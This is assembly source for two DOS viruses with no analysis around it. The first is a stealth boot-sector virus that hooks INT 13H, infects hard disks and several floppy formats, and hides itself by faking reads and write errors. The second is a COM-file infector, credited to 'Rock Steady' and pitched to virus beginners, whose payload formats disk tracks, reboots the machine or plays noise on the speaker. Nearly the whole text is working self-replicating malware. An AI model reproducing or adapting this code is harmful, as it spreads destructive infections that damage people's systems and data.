    mov    bx,OFFSET SB_DR_FLAG        ;required instead of ^ for a86

        mov     al,BYTE PTR [bx]
        cmp     al,80H                          ;infected, so redirect the write
        jnz     WB1
        mov     al,4                            ;make an index of the drive type
WB1:    mov     bl,3
        mul     bl
        add     ax,OFFSET BOOT_SECTOR_LOCATION  ;ax=@table entry
        mov     bx,ax
        mov     ch,[bx]                         ;get the location of original
        mov     dh,[bx+1]                       ;boot sector on disk
        mov     cl,[bx+2]                       ;prepare for the write
        mov     dl,ss:[bp+6]
        mov     bx,ss:[bp+10]
        mov     ax,ss:[bp+2]
        mov     es,ax
        mov     ax,301H
        pushf
        call    DWORD PTR [OLD_13H]             ;and do it
        sti
        mov     dl,ss:[bp+6]
        cmp     dl,80H                          ;was write going to hard drive?
        jnz     WB_15                           ;no
        mov     BYTE PTR [DR_FLAG],80H          ;yes, update partition info
        push    si
        push    di
        mov     di,OFFSET PART                  ;just move it from sec we just
        mov     si,ss:[bp+10]                   ;wrote into the viral boot sec
        add     si,OFFSET PART
    sub    si,OFFSET BOOT_START
        push    es
        pop     ds
        push    cs
        pop     es                              ;switch ds and es around
        mov     cx,20
        rep     movsw                           ;and do the move
        push    cs
        pop     ds
        mov     ax,301H
        mov     bx,OFFSET BOOT_START
        mov     cx,1                            ;Track 0, Sector 1
        mov     dx,80H                          ;drive 80H, Head 0
        pushf                                   ;go write updated viral boot sec
        call    DWORD PTR [OLD_13H]             ;with new partition info
        pop     di                              ;clean up
        pop     si

WB_15:  mov     al,ss:[bp+12]
        cmp     al,1                            ;was write more than 1 sector?
        jz      WB_EXIT                         ;if not, then exit

WRITE_1NEXT:                                    ;more than 1 sector
        mov     dl,ss:[bp+6]                    ;see if it's the hard drive
        cmp     dl,80H
        jz      WB_EXIT                         ;if so, ignore rest of the write
        pop     bp                              ;floppy drive, go write the rest
        pop     es                              ;as a second call to BIOS
        pop     ds
        pop     dx
        pop     cx                              ;restore all registers
        pop     bx
        pop     ax
        add     bx,512                          ;and modify a few to
        push    ax                              ;drop writing the first sector
        dec     al
        inc     cl
        pushf
        call    DWORD PTR cs:[OLD_13H]          ;go write the rest
        sti
        push    ax
        push    bp
        mov     bp,sp
        pushf                                   ;use c flag from call
        pop     ax                              ;to set c flag on the stack
        mov     ss:[bp+10],ax
        jc      WB2                             ;an error
                                                ;so exit with ah from 2nd int 13
        sub     bx,512
        dec     cl
        pop     bp
        pop     ax
        pop     ax                              ;else exit with ah=0
        mov     ah,0                            ;to indicate success
        iret

WB2:    pop     bp                              ;exit with ah from 2nd
        pop     ax                              ;interrupt
        add     sp,2
        iret


WB_EXIT:                                        ;exit after 1st write
        mov     ax,ss:[bp+18]                   ;set carry on stack to indicate
        push    ax                              ;a successful write operation
        popf
        clc
        pushf
        pop     ax
        mov     ss:[bp+18],ax
        pop     bp                              ;restore all registers and exit
        pop     es
        pop     ds
        pop     dx
        pop     cx
        pop     bx
        pop     ax
        mov     ah,0
        iret

WB_GOON:                                        ;pass control to ROM BIOS
        pop     bp                              ;just restore all registers
        pop     es
        pop     ds
        pop     dx
        pop     cx
        pop     bx
        pop     ax
        jmp     I13R                            ;and go do it


;*******************************************************************************
;Read hard disk sectors on Track 0, Head 0, Sec > 1. If the disk is infected,
;then instead of reading the true data there, return a block of 0's, since
;0 is the data stored in a freshly formatted but unused sector. This will
;fake the caller out and keep him from knowing that the virus is hiding there.
;If the disk is not infected, return the true data stored in those sectors.

READ_HARD:
        call    CHECK_DISK                      ;see if disk is infected
        jnz     RWH_EX                          ;no, let BIOS handle the read
        push    ax                              ;else save registers
        push    bx
        push    cx
        push    dx
        push    si
        push    di
        push    ds
        push    bp
        mov     bp,sp
        mov     BYTE PTR es:[bx],0              ;zero the first byte in the blk
        push    es
        pop     ds
        mov     si,bx                           ;set up es:di and ds:si
        mov     di,bx                           ;for a transfer
        inc     di
        mov     ah,0                            ;ax=number of sectors to read
        mov     bx,512                          ;bytes per sector
        mul     bx                              ;number of bytes to read in ax
        mov     cx,ax
        dec     cx                              ;number of bytes to move
        rep     movsb                           ;do fake read of all 0's

        mov     ax,ss:[bp+20]                   ;now set c flag
        push    ax                              ;to indicate succesful read
        popf
        clc
        pushf
        pop     ax
        mov     ss:[bp+20],ax

        pop     bp                              ;restore everything and exit
        pop     ds
        pop     di
        pop     si
        pop     dx
        pop     cx
        pop     bx
        pop     ax
        mov     ah,0                            ;set to indicate successful read
        iret

RWH_EX: jmp     I13R                            ;pass control to BIOS


;*******************************************************************************
;Handle writes to hard disk Track 0, Head 0, 1< Sec< 8. We must stop the write if
;the disk is infected. Instead, fake the return of an error by setting carry
;and returning ah=4 (sector not found).

WRITE_HARD:
        call    CHECK_DISK                      ;see if the disk is infected
        jnz     RWH_EX                          ;no, let BIOS handle it all
        push    bp                              ;yes, infected, so . . .
        push    ax
        mov     bp,sp
        mov     ax,ss:[bp+8]                    ;get flags off of stack
        push    ax
        popf                                    ;put them in current flags
        stc                                     ;set the carry flag
        pushf
        pop     ax
        mov     ss:[bp+8],ax                    ;and put flags back on stack
        pop     ax
        mov     ah,4                            ;set up sector not found error
        pop     bp
        iret                                    ;and get out of ISR


;*******************************************************************************
;See if disk dl is infected already. If so, return with Z set. This
;does not assume that registers have been saved, and saves/restores everything
;but the flags.

CHECK_DISK:
        push    ax                              ;save everything
        push    bx
        push    cx
        push    dx
        push    ds
        push    es
        push    cs
        pop     ds
        push    cs
        pop     es
        mov     al,dl
        call    GET_BOOT_SEC                    ;read the boot sector
        jnc     CD1
        xor     al,al                           ;act as if infected
        jmp     SHORT CD2                       ;in the event of an error
CD1:    call    IS_VBS                          ;see if viral boot sec (set z)
CD2:    pop     es                              ;restore everything
        pop     ds                              ;except the z flag
        pop     dx
        pop     cx
        pop     bx
        pop     ax
        ret


;*******************************************************************************
;This routine determines from the boot sector parameters what kind of floppy
;disk is in the drive being accessed, and calls the proper infection routine
;to infect the drive. It has no safeguards to prevent infecting an already
;infected disk. the routine CHECK_DISK must be called first to make sure you
;want to infect before you go and do it. This restores all registers to their
;initial state.

INFECT_FLOPPY:
        pushf                                   ;save everything
        push    si
        push    di
        push    ax
        push    bx
        push    cx
        push    dx
        push    ds
        push    es
        push    cs
        pop     es
        push    cs
        pop     ds
        sti
        mov     bx,OFFSET SCRATCHBUF + 13H      ;@ of sec cnt in boot sector
        mov     bx,[bx]                         ;get sector count for this disk
        mov     al,dl
        cmp     bx,720                          ;is it 360K? (720 sectors)
        jnz     IF_1                            ;no, try another possibility
        call    INFECT_360K                     ;yes, infect it
        jmp     SHORT IF_R                      ;and get out
IF_1:   cmp     bx,2400                         ;is it 1.2M? (2400 sectors)
        jnz     IF_2                            ;no, try another possibility
        call    INFECT_12M                      ;yes, infect it
        jmp     SHORT IF_R                      ;and get out
IF_2:   cmp     bx,1440                         ;is it 720K 3 1/2"? (1440 secs)
        jnz     IF_3                            ;no, try another possibility
        call    INFECT_720K                     ;yes, infect it
        jmp     SHORT IF_R                      ;and get out
IF_3:   cmp     bx,2880                         ;is it 1.44M 3 1/2"? (2880 secs)
        jnz     IF_R                            ;no - don't infect this disk
        call    INFECT_144M                     ;yes - infect it
IF_R:   pop     es                              ;restore everyting and return
        pop     ds
        pop     dx
        pop     cx
        pop     bx
        pop     ax
        pop     di
        pop     si
        popf
        ret


;*******************************************************************************
;Infect a 360 Kilobyte drive. This is done by formatting Track 40, Head 0,
;Sectors 1 to 6, putting the present boot sector in Sector 6 with the virus
;code in sectors 1 through 5, and then replacing the boot sector on the disk
;with the viral boot sector.

INFECT_360K:
        call    FORMAT_360                      ;format the required sectors
        jc      INF360_EXIT

        mov     bx,OFFSET SCRATCHBUF            ;and go write current boot sec
        push    ax                              ;at Track 40, Head 1, Sector 6
        mov     dl,al
        mov     dh,1                            ;head 1
        mov     cx,2806H                        ;track 40, sector 6
        mov     ax,0301H                        ;BIOS write, for 1 sector
        pushf
        call    DWORD PTR [OLD_13H]             ;(int 13H)
        pop     ax
        jc      INF360_EXIT

        mov     di,OFFSET BOOT_DATA
;       mov     si,OFFSET SCRATCHBUF + (OFFSET BOOT_DATA - OFFSET BOOT_START)
    mov    si,OFFSET SB_BOOT_DATA        ;required instead of ^ for A86

        mov     cx,32H / 2                      ;copy boot sector disk info over
        rep     movsw                           ;to new boot sector
        mov     al,BYTE PTR [SCRATCHBUF + 1FDH] ;copy drive letter there as well
        mov     BYTE PTR [BOOT_START + 1FDH],al
        mov     BYTE PTR [DR_FLAG],0            ;set proper drive type

        push    ax                              ;write new boot sector to disk
        mov     bx,OFFSET BOOT_START            ;buffer for the new boot sector
        call    PUT_BOOT_SEC                    ;go write it to disk
        pop     ax
        jc      INF360_EXIT

        mov     bx,OFFSET STEALTH               ;buffer for 5 secs of stealth
        mov     dl,al                           ;drive to write to
        mov     dh,1                            ;head 1
        mov     cx,2801H                        ;track 40, sector 1
        mov     ax,0305H                        ;write 5 sectors
        pushf
        call    DWORD PTR [OLD_13H]             ;(int 13H)
INF360_EXIT:
        ret                                     ;all done


;This routine formats Track 40, Head 1 so we can infect a 360k diskette.
FORMAT_360:
        push    ax                              ;save drive number in al
        mov     dl,al                           ;dl=drive no.
        mov     dh,1                            ;head 0
        mov     cx,2801H                        ;track 40, start at sector 1
        mov     ax,0506H                        ;format 6 sectors
        mov     bx,OFFSET FMT_360               ;format info for this sector
        pushf
        call    DWORD PTR [OLD_13H]             ;(int 13H)
        pop     ax
        ret


;*******************************************************************************
;Infect 1.2 megabyte Floppy Disk Drive AL with this virus. This is essentially
;the same as the 360K case, except we format Track 80 instead of track 40.

INFECT_12M:
        call    FORMAT_12M                      ;format the required sectors
        jc      INF12M_EXIT

        mov     bx,OFFSET SCRATCHBUF            ;and go boot sector at
        push    ax
        mov     dl,al
        mov     dh,1                            ;head 1
        mov     cx,5006H                        ;track 80, sector 6
        mov     ax,0301H                        ;BIOS write, for 1 sector
        pushf
        call    DWORD PTR [OLD_13H]             ;(int 13H)
        pop     ax
        jc      INF12M_EXIT

        mov     di,OFFSET BOOT_DATA
;       mov     si,OFFSET SCRATCHBUF + (OFFSET BOOT_DATA - OFFSET BOOT_START)
    mov    si,OFFSET SB_BOOT_DATA        ;required instead of ^ for A86

        mov     cx,32H / 2                      ;copy boot sector disk info over
        rep     movsw                           ;to new (viral) boot sector
        mov     al,BYTE PTR [SCRATCHBUF + 1FDH] ;copy drive letter there as well
        mov     BYTE PTR [BOOT_START + 1FDH],al
        mov     BYTE PTR [DR_FLAG],1            ;set proper diskette type

        push    ax                              ;and write viral boot sec to disk
        mov     bx,OFFSET BOOT_START            ;buffer for viral boot sector
        call    PUT_BOOT_SEC                    ;go write it to disk
        pop     ax
        jc      INF12M_EXIT

        mov     bx,OFFSET STEALTH               ;buffer for 5 secs of stealth
        mov     dl,al                           ;drive to write to
        mov     dh,1                            ;head 1
        mov     cx,5001H                        ;track 80, sector 1
        mov     ax,0305H                        ;write 5 sectors
        pushf
        call    DWORD PTR [OLD_13H]             ;(int 13H)
INF12M_EXIT:
        ret                                     ;all done


;Format Track 80, Head 1 so we can infect a 1.2 Meg diskette.
FORMAT_12M:
        push    ax
        mov     dl,al                           ;set drive number
        mov     dh,1                            ;head 1
        mov     cx,5001H                        ;track 80, start at sector 1
        mov     ax,0506H                        ;format 6 sectors
        mov     bx,OFFSET FMT_12M               ;format info for this sector
        pushf
        call    DWORD PTR [OLD_13H]             ;(int 13H)
        pop     ax
        ret


;*******************************************************************************
;Infect a 3 1/2" 720K drive. This process is a little different than for 5 1/4"
;drives. The virus goes in an existing data area on the disk, so no formatting
;is required. Instead, we 1) Read the boot sector and put it at Track 79, Head 1
;sector 9, 2) Put the five sectors of stealth routines at Track 79, Head 1,
;sector 4-8, 3) Put the viral boot sector at Track 0, Head 0, Sector 1, and
;4) Mark the diskette's FAT to indicate that the last three clusters are bad,
;so that DOS will not attempt to overwrite the virus code.

INFECT_720K:
        mov     bx,OFFSET SCRATCHBUF            ;go write boot sec at
        push    ax
        mov     dl,al
        mov     dh,1                            ;head 1
        mov     cx,4F09H                        ;track 79, sector 9
        mov     ax,0301H                        ;BIOS write, for 1 sector
        pushf
        call    DWORD PTR [OLD_13H]             ;(int 13H)
        pop     ax
        jc      INF720K_EXIT                    ;exit on error

        push    ax
        mov     di,OFFSET BOOT_DATA
;       mov     si,OFFSET SCRATCHBUF + (OFFSET BOOT_DATA - OFFSET BOOT_START)
    mov    si,OFFSET SB_BOOT_DATA        ;required instead of ^ for A86

        mov     cx,32H / 2                      ;copy boot sector disk info over
        rep     movsw                           ;to new boot sector
        mov     al,BYTE PTR [SCRATCHBUF + 1FDH] ;copy drive letter there as well
        mov     BYTE PTR [BOOT_START + 1FDH],al
        mov     BYTE PTR [DR_FLAG],2            ;set proper diskette type
        pop     ax

        push    ax                              ;write new boot sector to disk
        mov     bx,OFFSET BOOT_START
        call    PUT_BOOT_SEC                    ;go write it
        pop     ax
        jc      INF720K_EXIT

        mov     bx,OFFSET STEALTH               ;buffer for 5 sectors of stealth
        mov     dl,al                           ;drive to write to
        mov     dh,1                            ;head 1
        mov     cx,4F04H                        ;track 79, sector 4
        mov     ax,0305H                        ;write 5 sectors
        pushf
        call    DWORD PTR [OLD_13H]             ;(int 13H)
        jc      INF720K_EXIT

        mov     bx,OFFSET SCRATCHBUF            ;now modify the FAT
        mov     ax,0201H                        ;first read 1 sector
        mov     cx,4                            ;track 0, sector 4, head 0
        mov     dh,0
        pushf
        call    DWORD PTR [OLD_13H]             ;(int 13H)
        jc      INF720K_EXIT

        mov     di,OFFSET SCRATCHBUF + 44       ;modify the FAT in RAM
        mov     ax,7FF7H                        ;marking the last 3 clusters
        stosw                                   ;as bad
        mov     ax,0F7FFH
        stosw
        mov     ax,0FFFH
        stosw

        mov     ax,0301H                        ;now write the FAT back to disk
        mov     cx,4                            ;at track 0, sector 4, head 0
        pushf
        call    DWORD PTR [OLD_13H]
        jc      INF720K_EXIT

        mov     ax,0301H                        ;do second FAT too
        mov     cx,7                            ;at track 0, sector 7, head 0
        pushf
        call    DWORD PTR [OLD_13H]

INF720K_EXIT:
        ret                                     ;all done


;*******************************************************************************
;This routine infects a 1.44 megabyte 3 1/2" diskette. It is essentially the
;same as infecting a 720K diskette, except that the virus is placed in sectors
;13-17 on Track 79, Head 0, and the original boot sector is placed in Sector 18.

INFECT_144M:
        mov     bx,OFFSET SCRATCHBUF            ;go write boot sec at
        push    ax
        mov     dl,al
        mov     dh,1                            ;head 1
        mov     cx,4F12H                        ;track 79, sector 18
        mov     ax,0301H                        ;BIOS write, for 1 sector
        pushf
        call    DWORD PTR [OLD_13H]             ;(int 13H)
        pop     ax
        jc      INF144M_EXIT

        push    ax
        mov     di,OFFSET BOOT_DATA
;       mov     si,OFFSET SCRATCHBUF + (OFFSET BOOT_DATA - OFFSET BOOT_START)
    mov    si,OFFSET SB_BOOT_DATA        ;required instead of ^ for A86

        mov     cx,32H / 2                      ;copy boot sector disk info over
        rep     movsw                           ;to new boot sector
        mov     al,BYTE PTR [SCRATCHBUF + 1FDH] ;copy drive letter there as well
        mov     BYTE PTR [BOOT_START + 1FDH],al
        mov     BYTE PTR [DR_FLAG],3            ;set proper diskette type
        pop     ax

        push    ax                              ;and write new boot sector to disk
        mov     bx,OFFSET BOOT_START
        call    PUT_BOOT_SEC                    ;go write it to disk
        pop     ax
        jc      INF144M_EXIT

        mov     bx,OFFSET STEALTH               ;buffer for 5 sectors of stealth
        mov     dl,al                           ;drive to write to
        mov     dh,1                            ;head 1
        mov     cx,4F0DH                        ;track 79, sector 13
        mov     ax,0305H                        ;write 5 sectors
        pushf
        call    DWORD PTR [OLD_13H]             ;(int 13H)

        mov     bx,OFFSET SCRATCHBUF            ;now modify the FAT
        mov     ax,0201H                        ;first read 1 sector
        mov     cx,0AH                          ;track 0, sector 10, head 0
        mov     dh,0
        pushf
        call    DWORD PTR [OLD_13H]             ;(int 13H)
        jc      INF144M_EXIT

        mov     di,OFFSET SCRATCHBUF + 0A8H     ;modify the FAT in RAM
        mov     ax,es:[di]
        and     ax,000FH
        add     ax,0FF70H
        stosw
        mov     ax,07FF7H                       ;marking the last 6 clusters
        stosw                                   ;as bad
        mov     ax,0F7FFH
        stosw
        mov     ax,0FF7FH
        stosw
        mov     ax,0FF7H
        stosw

        mov     ax,0301H                        ;now write the FAT back to disk
        mov     cx,0AH                          ;at track 0, sector 10, head 0
        pushf
        call    DWORD PTR [OLD_13H]
        jc      INF144M_EXIT

        mov     ax,0301H                        ;do second FAT too
        mov     cx,1                            ;at track 0, sector 1, head 1
        mov     dh,1
        pushf
        call    DWORD PTR [OLD_13H]


INF144M_EXIT:
        ret                                     ;all done


;*******************************************************************************
;Infect Hard Disk Drive AL with this virus. This involves the following steps:
;A) Read the present boot sector. B) Copy it to Track 0, Head 0, Sector 7.
;C) Copy the disk parameter info into the viral boot sector in memory. D) Copy
;the viral boot sector to Track 0, Head 0, Sector 1. E) Copy the STEALTH
;routines to Track 0, Head 0, Sector 2, 5 sectors total.

INFECT_HARD:
        mov     al,80H                          ;set drive type flag to hard disk
        mov     BYTE PTR [DR_FLAG],al           ;cause that's where it's going

        call    GET_BOOT_SEC                    ;read the present boot sector

        mov     bx,OFFSET SCRATCHBUF            ;and go write it at
        push    ax
        mov     dl,al
        mov     dh,0                            ;head 0
        mov     cx,0007H                        ;track 0, sector 7
        mov     ax,0301H                        ;BIOS write, for 1 sector
        pushf
        call    DWORD PTR [OLD_13H]             ;(int 13H)
        pop     ax

        push    ax
        mov     di,OFFSET BOOT_DATA
;       mov     si,OFFSET SCRATCHBUF + (OFFSET BOOT_DATA - OFFSET BOOT_START)
    mov    si,OFFSET SB_BOOT_DATA        ;required instead of ^ for A86

        mov     cx,32H / 2                      ;copy boot sector disk info over
        rep     movsw                           ;to new boot sector
        mov     di,OFFSET BOOT_START + 200H - 42H
        mov     si,OFFSET SCRATCHBUF + 200H - 42H
        mov     cx,21H                          ;copy partition table
        rep     movsw                           ;to new boot sector too!
        pop     ax

        push    ax                              ;and write viral boot sector
        mov     bx,OFFSET BOOT_START
        call    PUT_BOOT_SEC
        pop     ax

        mov     bx,OFFSET STEALTH               ;buffer for 5 sectors of stealth
        mov     dl,al                           ;drive to write to
        mov     dh,0                            ;head 0
        mov     cx,0002H                        ;track 0, sector 2
        mov     ax,0305H                        ;write 5 sectors
        pushf
        call    DWORD PTR [OLD_13H]             ;(int 13H)

        ret


;*******************************************************************************
;This routine determines if a hard drive C: exists, and returns NZ if it does,
;Z if it does not.
IS_HARD_THERE:
        push    ds
        xor     ax,ax
        mov     ds,ax
        mov     bx,475H                         ;Get hard disk count from bios
        mov     al,[bx]                         ;put it in al
        pop     ds
        cmp     al,0                            ;and see if al=0 (no drives)
        ret


;*******************************************************************************
;Read the boot sector on the drive AL into SCRATCHBUF. This routine must
;prserve AL!

GET_BOOT_SEC:
        push    ax
        mov     bx,OFFSET SCRATCHBUF            ;buffer for the boot sector
        mov     dl,al                           ;this is the drive to read from
        mov     dh,0                            ;head 0
        mov     ch,0                            ;track 0
        mov     cl,1                            ;sector 1
        mov     al,1                            ;read 1 sector
        mov     ah,2                            ;BIOS read function
        pushf
        call    DWORD PTR [OLD_13H]             ;(int 13H)
        pop     ax
        ret


;*******************************************************************************
;This routine writes the data at es:bx to the drive in al at Track 0,
;Head 0, Sector 1 for 1 sector, making that data the new boot sector.

PUT_BOOT_SEC:
        mov     dl,al                           ;this is the drive to write to
        mov     dh,0                            ;head 0
        mov     ch,0                            ;track 0
        mov     cl,1                            ;sector 1
        mov     al,1                            ;read 1 sector
        mov     ah,3                            ;BIOS write function
        pushf
        call    DWORD PTR [OLD_13H]             ;(int 13H)
        ret


;*******************************************************************************
;Determine whether the boot sector in SCRATCHBUF is the viral boot sector.
;Returns Z if it is, NZ if not. The first 30 bytes of code, starting at BOOT,
;are checked to see if they are identical. If so, it must be the viral boot
;sector. It is assumed that es and ds are properly set to this segment when
;this is called.

IS_VBS:
        push    si                              ;save these
        push    di
        cld
        mov     di,OFFSET BOOT                  ;set up for a compare
;       mov     si,OFFSET SCRATCHBUF + (OFFSET BOOT - OFFSET BOOT_START)
    mov    si,OFFSET SB_BOOT        ;required instead of ^ for A86

        mov     cx,15
        repz    cmpsw                           ;compare 30 bytes
        pop     di                              ;restore these
        pop     si
        ret                                     ;and return with z properly set


;*******************************************************************************
;* A SCRATCH PAD BUFFER FOR DISK READS AND WRITES                              *
;*******************************************************************************

        ORG     7A00H

SCRATCHBUF:                       ;a total of 512 bytes
    DB    3 dup (0)
SB_BOOT_DATA:                    ;with references to correspond
    DB    32H dup (0)            ;to various areas in the boot
SB_DR_FLAG:                    ;sector at 7C00
    DB    0                ;these are only needed by A86
SB_BOOT:                    ;tasm and masm will let you
        DB      458 dup (0)            ;just do "db 512 dup (0)"


;*******************************************************************************
;* THIS IS THE REPLACEMENT (VIRAL) BOOT SECTOR                                 *
;*******************************************************************************

        ORG     7C00H                           ;Starting location for boot sec


BOOT_START:
        jmp     SHORT BOOT                      ;jump over data area
        db      090H                            ;an extra byte for near jump


BOOT_DATA:
        db      32H dup (?)                     ;data area and default dbt
                                                ;(copied from orig boot sector)

DR_FLAG:DB      0                               ;Drive type flag, 0=360K Floppy
                                                ;                 1=1.2M Floppy
                                                ;                 2=720K Floppy
                                                ;                 3=1.4M Floppy
                                                ;                 80H=Hard Disk

;The boot sector code starts here
BOOT:
        cli                                     ;interrupts off
        xor     ax,ax
        mov     ss,ax
        mov     ds,ax
        mov     es,ax                           ;set up segment registers
        mov     sp,OFFSET BOOT_START            ;and stack pointer
        sti

        mov     ax,[MEMSIZE]                    ;get size of memory available
        mov     cl,6                            ;on this system, in Kilobytes
        shl     ax,cl                           ;convert KBytes into a segment
        sub     ax,7E0H                         ;subtract enough so this code
        mov     es,ax                           ;will have the right offset to
        sub     [MEMSIZE],4                     ;go memory resident in high ram

GO_RELOC:
        mov     si,OFFSET BOOT_START            ;set up ds:si and es:di in order
        mov     di,si                           ;to relocate this code
        mov     cx,256                          ;to high memory
        rep     movsw                           ;and go move this sector
        push    es
        mov     ax,OFFSET RELOC
        push    ax                              ;push new far @RELOC onto stack
        retf                                    ;and go there with retf

RELOC:                                          ;now we're in high memory
        push    es                              ;so let's install the virus
        pop     ds
        mov     bx,OFFSET STEALTH               ;set up buffer to read virus
        mov     al,BYTE PTR [DR_FLAG]           ;drive number
        cmp     al,0                            ;Load from proper drive type
        jz      LOAD_360
        cmp     al,1
        jz      LOAD_12M
        cmp     al,2
        jz      LOAD_720
        cmp     al,3
        jz      LOAD_14M                        ;if none of the above,
                                                ;then it's a hard disk

LOAD_HARD:                                      ;load virus from hard disk
        mov     dx,80H                          ;hard drive 80H, head 0,
        mov     ch,0                            ;track 0,
        mov     cl,2                            ;start at sector 2
        jmp     SHORT LOAD1

LOAD_360:                                       ;load virus from 360 K floppy
        mov     ch,40                           ;track 40
        mov     cl,1                            ;start at sector 1
        jmp     SHORT LOAD

LOAD_12M:                                       ;load virus from 1.2 Meg floppy
        mov     ch,80                           ;track 80
        mov     cl,1                            ;start at sector 1
        jmp     SHORT LOAD

LOAD_720:                                       ;load virus from 720K floppy
        mov     ch,79                           ;track 79
        mov     cl,4                            ;start at sector 4
        jmp     SHORT LOAD                      ;go do it

LOAD_14M:                                       ;load from 1.44 Meg floppy
        mov     ch,79                           ;track 79
        mov     cl,13                           ;start at sector 13
;       jmp     SHORT LOAD                      ;go do it

LOAD:   mov     dx,100H                         ;disk 0, head 1
LOAD1:  mov     ax,206H                         ;read 6 sectors
        int     13H                             ;call BIOS to read it

MOVE_OLD_BS:
        xor     ax,ax                           ;now move old boot sector into
        mov     es,ax                           ;low memory
        mov     si,OFFSET SCRATCHBUF            ;at 0000:7C00
        mov     di,OFFSET BOOT_START
        mov     cx,256
        rep     movsw

SET_SEGMENTS:                                   ;change segments around a bit
        cli
        mov     ax,cs
        mov     ss,ax
        mov     sp,OFFSET STEALTH               ;set up the stack for the virus
        push    cs                              ;and also the es register
        pop     es

INSTALL_INT13H:                                 ;now hook the Disk BIOS int
        xor     ax,ax
        mov     ds,ax
        mov     si,13H*4                        ;save the old int 13H vector
        mov     di,OFFSET OLD_13H
        movsw
        movsw
        mov     ax,OFFSET INT_13H               ;and set up new interrupt 13H
        mov     bx,13H*4                        ;which everybody will have to
        mov     ds:[bx],ax                      ;use from now on
        mov     ax,es
        mov     ds:[bx+2],ax
        sti

CHECK_DRIVE:
        push    cs                              ;set ds to point here now
        pop     ds
        cmp     BYTE PTR [DR_FLAG],80H          ;if booting from a hard drive,
        jz      DONE                            ;nothing else needed at boot

FLOPPY_DISK:                                    ;if loading from a floppy drive,
        call    IS_HARD_THERE                   ;see if a hard disk exists here
        jz      DONE                            ;no hard disk, all done booting
        mov     al,80H                          ;else load boot sector from C:
        call    GET_BOOT_SEC                    ;into SCRATCHBUF
        call    IS_VBS                          ;and see if C: is infected
        jz      DONE                            ;yes, all done booting
        call    INFECT_HARD                     ;else go infect hard drive C:

DONE:
        mov     si,OFFSET PART                  ;clean partition data out of
        mov     di,OFFSET PART+1                ;memory image of boot sector
        mov     cx,3FH                          ;so it doesn't get spread to
        mov     BYTE PTR [si],0                 ;floppies when we infect them
        rep     movsb

        xor     ax,ax                           ;now go execute old boot sector
        push    ax                              ;at 0000:7C00
        mov     ax,OFFSET BOOT_START
        push    ax
        retf


        ORG     7DBEH

PART:   DB      40H dup (?)                     ;partition table goes here

        ORG     7DFEH

        DB      55H,0AAH                        ;boot sector ID goes here

ENDCODE:                                        ;label for the end of boot sec

COMSEG  ENDS

        END     START

;********************************************************************   
;   < PARSIT2B.ASM>   -   ParaSite Virus IIB                             
;                        By: Rock Steady                                
;  Close to one year I created this Virus. As you can see it is quite   
;  old... Maybe too Old... But here it is... It Sucks... but its great  
;  for any virus beginner... Anyhow...                                  
;  NOTES: Simple COM infector. 10% of the time it reboots the system    
;         20% it plays machine gun noices on the PC speaker... and      
;         70% of the time is infects another COM file... Have fun...    
;********************************************************************   
MOV_CX  MACRO X                                                         
        DB    0B9H                                                      
        DW    X                                                         
ENDM                                                                    
                                                                        
CODE    SEGMENT                                                         
        ASSUME DS:CODE,SS:CODE,CS:CODE,ES:CODE                          
        ORG     100H                                                    
                                                                        
                                                                        
VCODE:  JMP     virus                                                   
                                                                        
        NOP                                                             
        NOP                             ; To identify it as an Infected 
        NOP                             ; Program!                      
                                                                        
v_start equ     $                                                       
                                                                        
                                                                        
virus:  PUSH    CX                                                      
        MOV     DX,OFFSET vir_dat                                       
        CLD                                                             
        MOV     SI,DX                                                   
        ADD     SI,first_3                                              
        JMP     Rock_1                                                  
Rock_2:                                                                 
        MOV     DX,dta                                                  
        ADD     DX,SI                                                   
        MOV     AH,1AH                                                  
        INT     21H                                                     
        PUSH    ES                                                      
        PUSH    SI                                                      
        MOV     ES,DS:2CH                                               
        MOV     DI,0                                                    
        JMP     Day_Of_Week                                             
Rock_1:                                                                 
        MOV     CX,3                                                    
        MOV     DI,OFFSET 100H                                          
        REPZ    MOVSB                                                   
        MOV     SI,DX                                                   
        PUSH    ES                                                      
        MOV     AH,2FH                                                  
        INT     21H                                                     
        MOV     [SI+old_dta],BX                                         
        MOV     [SI+old_dts],ES                                         
        POP     ES                                                      
        JMP     Rock_2                                                  
                                                                        
Day_Of_Week:                                                            
        MOV     AH,2AH                  ;Get System date!               
        INT     21H                                                     
        CMP     AL,1                    ;Check to See if it's Monday!   
        JGE     day_check               ;Jump if later than Mondays     
        JMP     Get_Time                                                
day_check:                                                              
        CMP     AL,1                    ;Check to see if it is the 1st  
        JA      Get_Time                ;If yes, create a MESS...       
        JMP     Bad_Mondays             ;If not, then go on with infecti
mess:                                                                   
                                                                        
Bad_Mondays:                                                            
          MOV   DL,2                    ;The Formatting Tracks..        
          MOV   AH,05                                                   
          MOV   DH,80h                                                  
          MOV   CH,0                                                    
          INT   13h                                                     
                                                                        
Play_music:                                                             
          MOV   CX,20d                  ;Set number of Shots            
new_shot:                                                               
          PUSH  CX                      ;Save Count                     
          CALL  Shoot                                                   
          MOV   CX,4000H                                                
Silent:   LOOP  silent                                                  
          POP   CX                                                      
          LOOP  new_Shot                                                
          JMP   mess                                                    
                                                                        
SHOOT     proc  near                    ;The Machine Gun Noices...      
          MOV   DX,140h                                                 
          MOV   BX,20h                                                  
          IN    AL,61h                                                  
          AND   AL,11111100b                                            
SOUND:    XOR   AL,2                                                    
          OUT   61h,al                                                  
          ADD   dx,9248h                                                
          MOV   CL,3                                                    
          ROR   DX,CL                                                   
          MOV   CX,DX                                                   
          AND   cx,1ffh                                                 
          OR    CX,10                                                   
WAITA:    LOOP  WAITA                                                   
          DEC   BX                                                      
          JNZ   SOUND                                                   
          AND   AL,11111100b                                            
          OUT   61h,AL                                                  
          RET                                                           
Shoot     Endp                                                          
                                                                        
Get_Time:                                                               
          MOV   AH,2Ch                  ; Get System Time!              
          INT   21h                     ;                               
          AND   DH,0fh                                                  
          CMP   DH,3                                                    
          JB    Play_music                                              
          CMP   DH,3h                                                   
          JA    Find_Path                                               
          INT   19h                                                     
                                                                        
go:                                                                     
        MOV     AH, 47H                                                 
        XOR     DL,DL                                                   
        ADD     SI, OFFSET orig_path - OFFSET buffer - 8                
        INT     21H                                                     
        JC      find_path                                               
                                                                        
        MOV     AH,3BH                                                  
        MOV     DX,SI                                                   
        ADD     DX, OFFSET root_dir - OFFSET orig_path                  
        INT     21H                                                     
                                                                        
infect_root:                                                            
        MOV     [BX+nam_ptr],DI                                         
        MOV     SI,BX                                                   
        ADD     SI,f_ipec                                               
        MOV     CX,6                                                    
        REPZ    MOVSB                                                   
        JMP     hello                                                   
                                                                        
find_path:                                                              
        POP     SI                      ; Seek and Destroy...           
        PUSH    SI                                                      
